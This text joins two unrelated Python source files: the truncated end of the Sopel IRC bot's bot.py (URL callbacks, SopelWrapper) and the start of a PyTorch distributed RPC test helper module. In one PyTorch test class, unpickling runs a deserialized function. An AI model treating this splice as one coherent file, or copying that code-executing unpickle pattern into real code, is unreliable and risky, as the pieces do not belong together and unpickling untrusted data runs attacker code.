        Sopel's plugins, so instead of doing this in ``shutdown()``::

            regex = re.compile(r'http://example.com/path/.*')
            try:
                del bot.memory['url_callbacks'][regex]
            except KeyError:
                pass

        use this much more concise pattern::

            regex = re.compile(r'http://example.com/path/.*')
            bot.unregister_url_callback(regex)
    """
    if 'url_callbacks' not in self.memory:
        # nothing to unregister
        return

    # A plain string pattern is compiled so it hashes like the stored key.
    if isinstance(pattern, basestring):
        pattern = re.compile(pattern)

    try:
        del self.memory['url_callbacks'][pattern]
    except KeyError:
        pass
def search_url_callbacks(self, url):
    """Yield callbacks found for ``url`` matching their regex pattern.

    :param str url: URL found in a trigger
    :return: yield 2-value tuples of ``(callback, match)``

    For each pattern that matches the ``url`` parameter, it yields a
    2-value tuple of ``(callable, match)`` for that pattern.

    The ``callable`` is the one registered with
    :meth:`register_url_callback`, and the ``match`` is the result of
    the regex pattern's ``search`` method.

    .. versionadded:: 7.0

    .. seealso::

        The Python documentation for the `re.search`__ function and
        the `match object`__.

        .. __: https://docs.python.org/3.6/library/re.html#re.search
        .. __: https://docs.python.org/3.6/library/re.html#match-objects
    """
    if 'url_callbacks' not in self.memory:
        # nothing to search
        return

    for regex, function in tools.iteritems(self.memory['url_callbacks']):
        match = regex.search(url)
        if match:
            yield function, match
def restart(self, message):
    """Disconnect from IRC and restart the bot.

    :param str message: quit message sent to the server
    """
    # Flag is checked after disconnect to trigger a restart instead of exit.
    self.wantsrestart = True
    self.quit(message)
class SopelWrapper(object):
    """Wrapper around a Sopel instance and a Trigger

    :param sopel: Sopel instance
    :type sopel: :class:`~sopel.bot.Sopel`
    :param trigger: IRC Trigger line
    :type trigger: :class:`sopel.trigger.Trigger`

    This wrapper will be used to call Sopel's triggered commands and rules as
    their ``bot`` argument. It acts as a proxy to :meth:`send messages<say>` to
    the sender (either a channel or in a private message) and even to
    :meth:`reply to someone<reply>` in a channel.

    Attribute reads and writes (other than ``_bot``/``_trigger``) are
    forwarded to the wrapped Sopel instance via ``__getattr__``/``__setattr__``.
    """
    def __init__(self, sopel, trigger):
        # The custom __setattr__ for this class sets the attribute on the
        # original bot object. We don't want that for these, so we set them
        # with the normal __setattr__.
        object.__setattr__(self, '_bot', sopel)
        object.__setattr__(self, '_trigger', trigger)

    def __dir__(self):
        # Combine this wrapper's attributes with the wrapped bot's, so
        # introspection sees the full proxied surface.
        classattrs = [attr for attr in self.__class__.__dict__
                      if not attr.startswith('__')]
        return list(self.__dict__) + classattrs + dir(self._bot)

    def __getattr__(self, attr):
        # Only called for attributes not found on the wrapper itself;
        # delegates to the wrapped bot.
        return getattr(self._bot, attr)

    def __setattr__(self, attr, value):
        # All assignments land on the wrapped bot (see __init__ for the
        # two exceptions).
        return setattr(self._bot, attr, value)

    def say(self, message, destination=None, max_messages=1):
        """Override ``Sopel.say`` to send message to sender

        :param str message: message to say
        :param str destination: channel or person; defaults to trigger's sender
        :param int max_messages: max number of message splits

        The ``destination`` will default to the channel in which the
        trigger happened (or nickname, if received in a private message).

        .. seealso::

            :meth:`sopel.bot.Sopel.say`
        """
        if destination is None:
            destination = self._trigger.sender
        self._bot.say(message, destination, max_messages)

    def action(self, message, destination=None):
        """Override ``Sopel.action`` to send action to sender

        :param str message: action message
        :param str destination: channel or person; defaults to trigger's sender

        The ``destination`` will default to the channel in which the
        trigger happened (or nickname, if received in a private message).

        .. seealso::

            :meth:`sopel.bot.Sopel.action`
        """
        if destination is None:
            destination = self._trigger.sender
        self._bot.action(message, destination)

    def notice(self, message, destination=None):
        """Override ``Sopel.notice`` to send a notice to sender

        :param str message: notice message
        :param str destination: channel or person; defaults to trigger's sender

        The ``destination`` will default to the channel in which the
        trigger happened (or nickname, if received in a private message).

        .. seealso::

            :meth:`sopel.bot.Sopel.notice`
        """
        if destination is None:
            destination = self._trigger.sender
        self._bot.notice(message, destination)

    def reply(self, message, destination=None, reply_to=None, notice=False):
        """Override ``Sopel.reply`` to reply to someone

        :param str message: reply message
        :param str destination: channel or person; defaults to trigger's sender
        :param str reply_to: person to reply to; defaults to trigger's nick
        :param bool notice: reply as an IRC notice or with a simple message

        The ``destination`` will default to the channel in which the
        trigger happened (or nickname, if received in a private message).

        ``reply_to`` will default to the nickname who sent the trigger.

        .. seealso::

            :meth:`sopel.bot.Sopel.reply`
        """
        if destination is None:
            destination = self._trigger.sender
        if reply_to is None:
            reply_to = self._trigger.nick
        self._bot.reply(message, destination, reply_to, notice)

    def kick(self, nick, channel=None, message=None):
        """Override ``Sopel.kick`` to kick in a channel

        :param str nick: nick to kick out of the ``channel``
        :param str channel: optional channel to kick ``nick`` from
        :param str message: optional message for the kick

        The ``channel`` will default to the channel in which the call was
        triggered. If triggered from a private message, ``channel`` is
        required.

        .. seealso::

            :meth:`sopel.bot.Sopel.kick`
        """
        if channel is None:
            if self._trigger.is_privmsg:
                raise RuntimeError('Error: KICK requires a channel.')
            else:
                channel = self._trigger.sender
        if nick is None:
            raise RuntimeError('Error: KICK requires a nick.')
        self._bot.kick(nick, channel, message)
|
rpc_test.py | import concurrent.futures
import contextlib
import json
import os
import sys
import threading
import time
from collections import namedtuple
from functools import partial
from threading import Event
from threading import Lock
from unittest import mock
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torch.distributed.autograd as dist_autograd
from torch.distributed.rpc import RRef, _get_debug_info, _rref_context_get_debug_info, WorkerInfo
from torch.distributed.rpc.api import _delete_all_user_and_unforked_owner_rrefs, _use_rpc_pickler, _thread_local_var, _wait_all
from torch.distributed.rpc.internal import (
PythonUDF,
RPCExecMode,
_internal_rpc_pickler,
_build_rpc_profiling_key,
)
from torch.futures import Future
from torch.testing._internal.common_distributed import (
skip_if_lt_x_gpu,
captured_output,
)
from torch.testing._internal.common_utils import (
IS_MACOS,
load_tests,
sandcastle_skip_if,
get_cycles_per_ms,
)
from torch.testing._internal.dist_utils import (
dist_init,
get_function_event,
initialize_pg,
wait_until_node_failure,
wait_until_pending_futures_and_users_flushed,
wait_until_owners_and_forks_on_rank,
worker_name,
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
from torch.testing._internal.common_utils import TemporaryFileName
from torch.autograd.profiler_legacy import profile as _profile
def foo_add():
    """Return the elementwise sum of two one-element tensors of ones."""
    lhs = torch.ones(1)
    rhs = torch.ones(1)
    return torch.add(lhs, rhs)
def udf_with_torch_ops(device=-1, use_record_function=False):
    """Run a fixed chain of tensor ops, optionally on a CUDA device and
    optionally inside a profiler ``record_function`` block.

    Returns None; the point is the sequence of operator invocations
    (see EXPECTED_REMOTE_EVENTS).
    """
    if device == -1:
        device_ctx = contextlib.suppress()
    else:
        device_ctx = torch.cuda.device(device)
    if use_record_function:
        record_function_ctx = torch.autograd.profiler.record_function("##forward##")
    else:
        record_function_ctx = contextlib.suppress()
    with device_ctx, record_function_ctx:
        first, second = torch.ones(1), torch.ones(1)
        out = torch.add(first, second)
        out = torch.mul(out, out)
        out = out.relu()
        out = out.sigmoid()
# Events (operator invocations) that are expected to be ran as part of the above
# function.
EXPECTED_REMOTE_EVENTS = [
    "aten::ones",
    "aten::ones",
    "aten::add",
    "aten::mul",
    "aten::relu",
    "aten::clamp_min",
    "aten::sigmoid",
]

# Remote operations are prefixed with the following string for RPC profiling.
REMOTE_OP_STR = "#remote_op: "


# Module-level futures used to coordinate across test workers.
VALUE_FUTURE = concurrent.futures.Future()
DONE_FUTURE = concurrent.futures.Future()

# Number of GPU cycles used by async_cuda_sleep_and_set_to_one.
FIFTY_MIL_CYCLES = 50000000

# Shared counter incremented by _increment_count (for rpc barrier tests).
_rpc_barrier_count = 0

def _increment_count():
    """Bump the module-level barrier counter by one."""
    global _rpc_barrier_count
    _rpc_barrier_count += 1

def _reset_count():
    """Reset the module-level barrier counter to zero."""
    global _rpc_barrier_count
    _rpc_barrier_count = 0
class StubRpcAgent:
    """Minimal stand-in for an RPC agent: only reports worker infos."""

    def __init__(self, world_size):
        # Number of workers this stub pretends to know about.
        self.world_size = world_size

    def get_worker_infos(self):
        # Returns a set of WorkerInfo, one per rank.
        return {
            WorkerInfo(name=worker_name(rank), id=rank)
            for rank in range(self.world_size)
        }


def _stub_construct_rpc_backend_options_handler(**kwargs):
    """Stub backend-options constructor used when registering a fake backend."""
    return mock.Mock()  # RpcBackendOptions.


def _stub_init_rpc_backend_handler(store, name, rank, world_size, rpc_backend_options):
    """Stub backend initializer: returns a StubRpcAgent instead of a real one."""
    return StubRpcAgent(world_size=world_size)
def set_value(value):
    """Fulfil the module-level VALUE_FUTURE (unblocks wait_for_value_future)."""
    VALUE_FUTURE.set_result(value)


def wait_for_value_future():
    """Block until VALUE_FUTURE is set, then return its value."""
    return VALUE_FUTURE.result()


def set_and_check_done(value):
    """Set VALUE_FUTURE, then block on DONE_FUTURE and return its result."""
    VALUE_FUTURE.set_result(value)
    return DONE_FUTURE.result()


# it is used to test python user defined function over rpc
# classes and functions are used to test python user defined class and
# methods over rpc
TensorClass = namedtuple("TensorClass", ["tensors"])
class MyPickleClass:
    """Class with custom pickling that round-trips through the internal RPC
    pickler: pickling serializes a PythonUDF; unpickling executes it and
    stores the result in ``t``.
    """

    def __init__(self):
        # Holds the deserialized UDF result (or a value set via set()).
        self.t = None

    def __getstate__(self):
        # Serialize a UDF (my_tensor_function on two 2x2 ones tensors)
        # instead of this object's state.
        (pickled_python_udf, tensors) = _internal_rpc_pickler.serialize(
            PythonUDF(my_tensor_function, (torch.ones(2, 2), torch.ones(2, 2)), None)
        )
        return (pickled_python_udf, tensors)

    def __setstate__(self, obj):
        # Rebuild the UDF and run it; the result becomes this object's state.
        python_udf = _internal_rpc_pickler.deserialize(obj[0], obj[1])
        result = python_udf.func(python_udf.args[0], python_udf.args[1])
        self.t = result

    def set(self, val):
        self.t = val
class SlowPickleClass:
    """Pickle-able holder whose (de)serialization sleeps for ``t`` seconds,
    used to simulate slow RPC message serialization.
    """

    def __init__(self, t):
        self.t = t

    def __getstate__(self):
        # Simulate slow serialization.
        time.sleep(self.t)
        return (self.t, )

    def __setstate__(self, state):
        # Simulate slow deserialization.
        self.t = state[0]
        time.sleep(self.t)
class MyClass:
    """Simple stateful class used as a remote-object target in RPC tests."""

    def __init__(self, a, delay=False):
        self.a = a
        # delay initialization to simulate errors if specified
        if delay:
            time.sleep(2)

    @staticmethod
    def my_static_method(f):
        """Return whether ``f`` is greater than 10."""
        return f > 10

    @classmethod
    def my_class_method(cls, d, e):
        """Return ``d + e``."""
        return d + e

    def my_instance_method(self, b):
        """Return ``self.a + b``."""
        return self.a + b

    def increment_value(self, increment):
        """Add ``increment`` to the stored value in place."""
        self.a += increment

    def get_value(self):
        """Return the stored value."""
        return self.a

    def my_slow_method(self, my_tensor_arg):
        """Sleep 5 seconds, then return ``self.a + my_tensor_arg``."""
        time.sleep(5)
        return torch.add(self.a, my_tensor_arg)
def _call_method_on_rref(method, rref, *args, **kwargs):
    """Invoke ``method`` on the local value held by ``rref``."""
    return method(rref.local_value(), *args, **kwargs)


def get_rref_list(values):
    """Wrap each value in a MyClass instance owned by a local RRef."""
    return [RRef(MyClass(a)) for a in values]


def add_rref_to_value(rref, value):
    """Fetch the rref's value to the local worker and add ``value``."""
    return rref.to_here() + value


def run_nested_pickle(pickle_cls_instance, tensor):
    """Add ``tensor`` to the ``t`` attribute of an unpickled MyPickleClass."""
    return pickle_cls_instance.t + tensor
def build_sparse_tensor(coalesce=False):
    """Return a fixed 2x3 sparse COO tensor, optionally coalesced.

    Dense equivalent: [[0, 0, 3], [4, 0, 5]].
    """
    indices = [[0, 1, 1], [2, 0, 2]]
    values = [3, 4, 5]
    result = torch.sparse_coo_tensor(indices, values, (2, 3))
    return result.coalesce() if coalesce else result
def build_complex_tensors():
    """Return nested containers of a shared 3x3 ones tensor, including a
    dict keyed by the tensor itself (tensors hash by identity).
    """
    base = torch.ones(3, 3)
    pair = [base, base]
    nested = [pair, pair]
    mixed = [base, pair]
    keyed = {base: mixed}
    return [base, pair, nested, mixed, keyed]
def non_cont_test(t_view, t_cont):
    """Validate the contiguity contract of the two arguments.

    ``t_view`` must be non-contiguous, ``t_cont`` must be contiguous, and
    both must hold equal values; returns ``t_view`` on success.
    """
    if t_view.is_contiguous():
        raise Exception('t_view is contiguous!')
    if not t_cont.is_contiguous():
        raise Exception('t_cont is not contiguous!')
    if not torch.equal(t_view, t_cont):
        raise Exception('t_view is not equal to t_cont!')
    return t_view
def my_function(a, b, c):
    """Return the sum of the three arguments."""
    return a + b + c


def my_tensor_function(a, b):
    """Return the elementwise sum of the two arguments."""
    return a + b
def my_container_sum(a):
    """Return the sum of all elements in container ``a``.

    Fix: the original seeded the accumulator with ``a[0]`` and then used
    ``result += tensor``; for tensors ``+=`` is in-place, so the caller's
    first element was silently mutated. Accumulate out-of-place instead;
    the returned value is unchanged.
    """
    result = a[0]
    for tensor in a[1:]:
        result = result + tensor
    return result
def my_sleep_func(seconds=1):
    """Sleep for ``seconds``, then return the scalar tensor 1 * 1."""
    time.sleep(seconds)
    one = torch.tensor(1)
    return torch.mul(one, one)
def my_complex_tensor_function(list_input, tensor_class_input, dict_input):
    """Combine tensors from a list, a TensorClass, and a dict.

    Returns a 4-tuple: the accumulated sum and the first three tensors of
    ``tensor_class_input.tensors``.

    NOTE(review): ``res`` starts as ``list_input[0]`` and the loop below
    also iterates over that element, so the first tensor is counted twice;
    and because ``+=`` is in-place on tensors, ``list_input[0]`` is mutated.
    This mirrors the original behavior — confirm it is intended before
    changing.
    """
    res = list_input[0]
    for t in list_input:
        res += t
    for k, v in dict_input.items():
        res += v
    complex_tensors = tensor_class_input.tensors
    return (res, complex_tensors[0], complex_tensors[1], complex_tensors[2])
def my_rref_function(rref_a, rref_b):
    """Fetch both rrefs' values to the local worker and return their sum."""
    return rref_a.to_here() + rref_b.to_here()
def delayed_add(a, b, seconds=0.05):
    """Sleep briefly, then return ``a + b``."""
    time.sleep(seconds)
    return a + b


def identity(a):
    """Return the argument unchanged."""
    return a


def no_result():
    """Side-effect-only helper: prints a message and returns None."""
    print("do nothing")


def raise_or_inc(value):
    """Raise ValueError for 2-element tensors; otherwise return value + 1."""
    if value.numel() == 2:
        raise ValueError("Expected error")
    return value + 1
def nested_rpc(dst):
    """From inside an RPC, issue a synchronous add RPC to ``dst``."""
    return rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))


def nested_rpc_sparse(dst):
    """Sparse-tensor variant of nested_rpc."""
    return rpc.rpc_sync(
        dst,
        torch.add,
        args=(build_sparse_tensor(), build_sparse_tensor())
    )


def multi_layer_nested_async_rpc(dst, world_size, ttl):
    # this method returns immediately without blocking the callee, but will
    # generate additional requests.
    if ttl > 0:
        current_dst = worker_name(dst)
        next_dst = (dst + 1) % world_size
        rpc.rpc_async(
            current_dst,
            multi_layer_nested_async_rpc,
            args=(next_dst, world_size, ttl - 1),
        )
        return 0


def nested_rref(dst):
    """Return a pair of remote RRefs owned by ``dst``."""
    return (
        rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1)),
        rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 2)),
    )


def nested_rref_sparse(dst):
    """Sparse-tensor variant of nested_rref."""
    return (
        rpc.remote(
            dst,
            torch.add,
            args=(build_sparse_tensor(), build_sparse_tensor())
        ),
        rpc.remote(
            dst,
            torch.add,
            args=(build_sparse_tensor(), build_sparse_tensor())
        ),
    )


def nested_remote(dst):
    """Create a remote RRef on ``dst`` and immediately fetch its value."""
    rref = rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 3))
    return rref.to_here()


def nested_remote_sparse(dst):
    """Sparse-tensor variant of nested_remote."""
    rref = rpc.remote(dst, torch.add, args=(build_sparse_tensor(), build_sparse_tensor()))
    return rref.to_here()


def rref_forward_chain(dst, world_size, rref, ttl):
    """Forward an rref through ``ttl`` workers; the last hop fetches it."""
    if ttl > 0:
        current_dst = worker_name(dst)
        next_dst = (dst + 1) % world_size
        ret_rref = rpc.remote(
            current_dst, rref_forward_chain, args=(next_dst, world_size, rref, ttl - 1)
        )
        return [ret_rref]
    else:
        return rref.to_here()


def rpc_return_rref(dst):
    """Return an RRef owned by ``dst`` for a simple add."""
    return rpc.remote(dst, torch.add, args=(torch.ones(2, 2), 1))
def light_rpc():
    """Cheapest possible RPC payload: no work, returns 0."""
    return 0


def heavy_rpc(tensor):
    """Run ~100 rounds of in-place tensor math (mutates the argument);
    always returns 0."""
    for step in range(1, 100):
        tensor *= step
        tensor /= step + 1
    return 0


def heavy_rpc_sparse(tensor):
    """Same workload with out-of-place division; always returns 0."""
    for step in range(1, 100):
        tensor *= step
        tensor = tensor / (step + 1)
    return 0
@torch.jit.script
def heavy_rpc_torchscript(tensor):
    # TorchScript version of heavy_rpc: ~100 rounds of in-place math.
    for i in range(1, 100):
        tensor *= i
        tensor /= i + 1
    return 0


@torch.jit.script
def my_script_func(tensor):
    # Scripted function returning tensor + tensor.
    return torch.add(tensor, tensor)
# Error message asserted on by tests that expect a remote failure.
expected_err = "Expected error"

def raise_func():
    """Always raise ValueError with the expected test message."""
    raise ValueError(expected_err)

@torch.jit.script
def raise_func_script(expected_err: str) -> torch.Tensor:
    # Scripted variant: raises with the caller-supplied message.
    raise ValueError(expected_err)

# Multi-line error message used to test error-string escaping over RPC.
expected_err_escape = "\nFirst line of error \n next line of error \n last line of error"
def raise_func_escape():
    """Always raise ValueError with a multi-line message."""
    raise ValueError(expected_err_escape)


# Module-level rref slot used to test owner lifetime across RPCs.
global_rref = None

def set_global_rref(rref):
    """Store ``rref`` in the module-level slot."""
    global global_rref
    global_rref = rref

def clear_global_rref():
    """Clear the module-level rref slot."""
    global global_rref
    global_rref = None


def check_rref_confirmed(rref):
    """Return whether the owner has confirmed this rref."""
    return rref.confirmed_by_owner()


def get_rref_debug_info():
    """Return the RRef context's debug-info dict."""
    return _rref_context_get_debug_info()
def add_use_future_cb(to, x, y, z):
    """Compute (x + y) via RPC, then + z in a concurrent.futures callback."""
    out = concurrent.futures.Future()

    def callback(fut):
        out.set_result(fut.wait() + z)

    fut = rpc.rpc_async(to, torch.add, args=(x, y))
    fut.then(callback)
    # Blocks until the callback fires.
    return out.result()


def get_events_from_profile(profile_rref):
    """Return the function events recorded by a remote profiler rref."""
    return profile_rref.local_value().process_global_function_events


def add_use_future_set_result(to, x, y, z):
    """Same as add_use_future_cb but bridged through a torch Future."""
    out = torch.futures.Future()
    fut = rpc.rpc_async(to, torch.add, args=(x, y))
    fut.then(lambda fut : out.set_result(fut.wait() + z))
    return out.wait()


def add_use_future_nested_cb(to, x, y, z):
    """Chain two RPC adds ((x + y) + z) through nested callbacks."""
    out = torch.futures.Future()

    def callback(fut1):
        # Second hop: add z to the first result.
        fut2 = rpc.rpc_async(to, torch.add, args=(fut1.wait(), z))
        fut2.then(lambda fut2 : out.set_result(fut2.wait()))

    fut1 = rpc.rpc_async(to, torch.add, args=(x, y))
    fut1.then(callback)
    return out.wait()


def fail_on_fut(fut):
    """No-op placeholder that accepts a future."""
    pass
@rpc.functions.async_execution
def async_raise_func():
    """Async-execution function that raises immediately."""
    raise RuntimeError("Expected error")


@rpc.functions.async_execution
def async_wrong_type():
    # Returns a tensor instead of the Future async_execution requires;
    # used to test the resulting error.
    return torch.zeros(2, 2)


@rpc.functions.async_execution
def async_add(to, x, y):
    """Return the Future of a nested add RPC to ``to``."""
    return rpc.rpc_async(to, torch.add, args=(x, y))


def slow_add(x, y, device="cpu"):
    """Sleep 1s, add on ``device``, and return the result on CPU."""
    time.sleep(1)
    x = x.to(device)
    y = y.to(device)
    return torch.add(x, y).cpu()


@rpc.functions.async_execution
def slow_async_add(to, x, y, device="cpu"):
    """Async wrapper around slow_add executed on ``to``."""
    return rpc.rpc_async(to, slow_add, args=(x, y, device))


@rpc.functions.async_execution
def async_add_with_future_ctor(to, x, y, z):
    """Compute (x + y) + z, completing a manually-constructed Future."""
    fut = torch.futures.Future()
    rpc.rpc_async(to, torch.add, args=(x, y)).then(
        lambda fut1: fut.set_result(fut1.wait() + z)
    )
    return fut


@rpc.functions.async_execution
def async_add_chained(to, x, y, z):
    """Compute (x + y) + z by chaining a callback onto the RPC future."""
    return rpc.rpc_async(to, torch.add, args=(x, y)).then(
        lambda fut: fut.wait() + z
    )


@rpc.functions.async_execution
def async_add_chained_multi(to, x, num, step):
    """Compute x + num * step by chaining ``num`` callbacks."""
    fut = rpc.rpc_async(to, torch.add, args=(x, 0))
    for _ in range(num):
        fut = fut.then(lambda fut: fut.wait() + step)
    return fut


@rpc.functions.async_execution
def async_add_nested(to, x, y, z):
    """Compute (x + y) + z via a nested async_execution RPC."""
    return rpc.rpc_async(to, async_add, args=(to, x, y)).then(
        lambda fut: fut.wait() + z
    )


@rpc.functions.async_execution
def async_add_multi_fanout(to, x, num, step):
    """Fan out ``num`` add RPCs and accumulate their results into one Future."""
    futs = []
    for i in range(num):
        if i == 0:
            futs.append(rpc.rpc_async(to, torch.add, args=(x, step)))
        else:
            futs.append(rpc.rpc_async(to, torch.add, args=(0, step)))

    # TODO: use torch.futures.collect_all
    lock = Lock()
    state = {"cnt": 0, "ret": torch.zeros_like(x)}
    ret_future = torch.futures.Future()

    def inc_and_set(fut):
        # Last callback to arrive completes the aggregate future.
        with lock:
            state["cnt"] += 1
            state["ret"] += fut.wait()
            if state["cnt"] >= len(futs):
                ret_future.set_result(state["ret"])

    for fut in futs:
        fut.then(inc_and_set)

    return ret_future


@rpc.functions.async_execution
def async_cuda_sleep_and_set_to_one(t):
    """On a side CUDA stream, sleep ~1s of GPU time, fill ``t`` with ones,
    and return a CUDA-aware Future completed with ``t``."""
    device = t.device
    original_stream = torch.cuda.current_stream(device)
    new_stream = torch.cuda.Stream(device)
    new_stream.wait_stream(original_stream)
    with torch.cuda.stream(new_stream):
        torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
        t.fill_(1)
        fut = Future(devices=[device])
        fut.set_result(t)
        return fut


@rpc.functions.async_execution
def async_cuda_nested_add(to, x, y, z):
    """Compute (x + y) + z where the callback first burns ~1s of GPU time."""
    def cb(fut):
        torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
        return fut.value() + z

    return rpc.rpc_async(to, torch.add, args=(x, y)).then(cb)
# A custom Python class that contains a tensor, needed to see if we correctly
# use the Python pickler to extract tensors from non-IValue-convertible types.
class TensorWrapper:
    """Holds one tensor plus deliberately non-picklable fields (lock, CUDA event,
    live thread) to verify the RPC pickler extracts tensors and skips the rest."""
    __slots__ = ("tensor", "lock", "event", "thread")
    def __init__(self, t):
        self.tensor = t
        # Add one non-picklable field, to ensure it's ignored/skipped.
        self.lock = Lock()
        self.event = torch.cuda.Event(enable_timing=True)
        self.thread = threading.Thread()
        self.thread.start()
    def increase(self, v):
        """Add `v` to the wrapped tensor in place, under the lock."""
        with self.lock:
            self.tensor += v
    def sum(self):
        """Record the CUDA event, then return the tensor's sum, under the lock."""
        with self.lock:
            self.event.record()
            return self.tensor.sum()
class AsyncExecutionClass:
    """Exercises @rpc.functions.async_execution on static, class, and bound methods.

    Note the decorator order: async_execution must be applied to the function
    itself, i.e. listed below @staticmethod/@classmethod.
    """
    @staticmethod
    @rpc.functions.async_execution
    def static_async_add(to, x, y, z):
        """Static method variant: chain `+ z` onto a remote add."""
        return rpc.rpc_async(to, torch.add, args=(x, y)).then(
            lambda fut: fut.wait() + z
        )
    @classmethod
    @rpc.functions.async_execution
    def class_async_add(cls, to, x, y, z):
        """Class method variant: complete a manually-constructed Future."""
        ret_fut = torch.futures.Future()
        rpc.rpc_async(to, torch.add, args=(x, y)).then(
            lambda fut: ret_fut.set_result(fut.wait() + z)
        )
        return ret_fut
    @rpc.functions.async_execution
    def bound_async_add(self, to, x, y, z):
        """Bound (instance) method variant: chain `+ z` onto a remote add."""
        return rpc.rpc_async(to, torch.add, args=(x, y)).then(
            lambda fut: fut.wait() + z
        )
def return_future():
    """Return a fresh, never-completed torch Future."""
    fresh = torch.futures.Future()
    return fresh
class FooBackendOptions(rpc.RpcBackendOptions):
    """Minimal RpcBackendOptions subclass carrying only an init_method string."""
    def __init__(self, init_method):
        # Must call the __init__ of the superclass (and do so directly,
        # without using super()) because... pybind.
        rpc.RpcBackendOptions.__init__(self)
        self.init_method = init_method
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This self-assignment re-exports the name so the
# import is not flagged as unused by flake.
load_tests = load_tests
class MyEmbeddingBagModel(torch.nn.Module):
    """Thin EmbeddingBag wrapper; `sparse` selects sparse vs. dense gradients."""

    def __init__(self, sparse):
        super().__init__()
        # 10 embeddings of dimension 10, matching the original fixture.
        self.eb = torch.nn.EmbeddingBag(10, 10, sparse=sparse)

    def forward(self, x):
        return self.eb(x)
class MyParameterServer:
    """Toy parameter server that averages one tensor across `trainers` reporters.

    Each trainer calls `average` once per iteration; when the last report for
    the current iteration arrives, every pending Future is completed with the
    mean of all reported tensors.
    """
    def __init__(self, trainers):
        self.lock = Lock()
        self.trainers = trainers    # number of reports expected per iteration
        self.iteration = 0          # highest iteration seen so far
        self.updates = 0            # reports received for the current iteration
        self.futures = []           # Futures pending completion this iteration
        self.total = None           # running sum of reported tensors
        self.gradient = None        # averaged result, set once per full round
    @staticmethod
    def get_gradient(rref):
        """Return the averaged gradient stored on the owner of `rref`."""
        return rref.local_value().gradient
    @staticmethod
    @rpc.functions.async_execution
    def average(rref, riteration, tensor):
        """Accumulate `tensor` for `riteration`; complete all pending Futures
        with the average once every trainer has reported.

        Returns a Future that resolves to the averaged tensor.
        """
        self = rref.local_value()
        fut = torch.futures.Future()
        with self.lock:
            # A report from a newer iteration resets the accumulation state.
            if riteration > self.iteration:
                self.iteration = riteration
                self.updates = 0
                self.futures.clear()
            self.futures.append(fut)
            if self.total is None:
                self.total = tensor
            else:
                self.total += tensor
            self.updates += 1
            if self.trainers == self.updates:
                # Compute the average once; the original recomputed it per
                # future and shadowed `fut` with the loop variable.
                self.gradient = self.total / float(self.trainers)
                for pending in self.futures:
                    pending.set_result(self.gradient)
        return fut
class RpcTestCommon():
    """Helper implementations shared by the dense and sparse RPC test suites.

    Methods here perform the actual multi-worker work; thin test_* wrappers in
    subclasses choose the inputs. Call ordering across workers is significant
    throughout — do not reorder RPC/barrier/shutdown statements.
    """
    def _run_func_in_mode(self, to, fn, mode, args=None, kwargs=None):
        """Invoke `fn` on worker `to` via sync, async, or remote execution."""
        if mode == RPCExecMode.SYNC:
            return rpc.rpc_sync(to, fn, args=args, kwargs=kwargs)
        elif mode == RPCExecMode.ASYNC:
            return rpc.rpc_async(to, fn, args=args, kwargs=kwargs).wait()
        elif mode == RPCExecMode.REMOTE:
            return rpc.remote(to, fn, args=args, kwargs=kwargs).to_here()
    def _self_py_udf_remote(self, worker_info, x, y, z):
        """Create an RRef to a UDF result on `worker_info` and fetch it."""
        rref = rpc.remote(worker_info, my_function, args=(x, y, z))
        self.assertEqual(rref.to_here(), x + y + z)
    def _self_remote_rref_as_rpc_arg(self, dst, x, y, z):
        """Pass a self-owned RRef as an argument of rpc_async/rpc_sync to `dst`."""
        self_worker_info = rpc.get_worker_info()
        rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
        fut = rpc.rpc_async(dst, add_rref_to_value, args=(rref, x))
        ret = rpc.rpc_sync(dst, add_rref_to_value, args=(rref, x + y))
        self.assertEqual(ret, x + y + z + x + y)
        self.assertEqual(fut.wait(), x + y + z + x)
    def _self_remote_rref_as_remote_arg(self, dst, x, y, z):
        """Pass a self-owned RRef as an argument of rpc.remote to `dst`."""
        self_worker_info = rpc.get_worker_info()
        rref = rpc.remote(self_worker_info, my_function, args=(x, y, z))
        ret_rref = rpc.remote(dst, add_rref_to_value, args=(rref, x))
        self.assertEqual(
            ret_rref.to_here(), x + y + z + x
        )
    def _world_size_one(self, a, b):
        """Run sync/async/remote round-trips against a single-worker RPC world.

        Only rank 0 participates; it initializes a world of size 1, talks to
        itself, and shuts down. Other ranks do nothing.
        """
        if self.rank == 0:
            rpc.init_rpc(
                name="me",
                backend=self.rpc_backend,
                rank=0,
                world_size=1,
                rpc_backend_options=self.rpc_backend_options,
            )
            def _rpc_sync(x, y):
                expect = x * 2
                result = rpc.rpc_sync(
                    "me",
                    my_tensor_function,
                    args=(x, y)
                )
                self.assertEqual(expect, result)
            def _rpc_async(x, y):
                expect = x * 2
                result = rpc.rpc_async(
                    "me",
                    my_tensor_function,
                    args=(x, y)
                ).wait()
                self.assertEqual(expect, result)
            def _remote(x, y):
                expect = x * 2
                result = rpc.remote(
                    "me",
                    my_tensor_function,
                    args=(x, y)
                ).to_here()
                self.assertEqual(expect, result)
            _rpc_sync(a, b)
            _rpc_async(a, b)
            _remote(a, b)
            rpc.shutdown()
    def _multi_rpc(self, sparse):
        """Issue 20 consecutive rpc_sync adds (dense or sparse) to the next rank."""
        dst_rank = (self.rank + 1) % self.world_size
        for i in range(20):
            n = i + self.rank + 1
            if sparse:
                x = build_sparse_tensor() * n
                y = build_sparse_tensor() * n
            else:
                x = torch.ones(2, 2)
                y = torch.ones(2, 2)
            ret = rpc.rpc_sync(
                worker_name(dst_rank),
                torch.add,
                args=(x, y),
            )
            self.assertEqual(ret, x * 2)
    def _wait_all_workers(self, f, x):
        """Run an uneven workload, then verify _wait_all_workers + ungraceful shutdown."""
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        self._run_uneven_workload(f, x)
        # worker0 calls this at the end after waiting for RPC responses.
        # worker1/2 calls this immediately and has some works after it.
        # worker3 calls this immediately and has no more work.
        rpc.api._wait_all_workers()
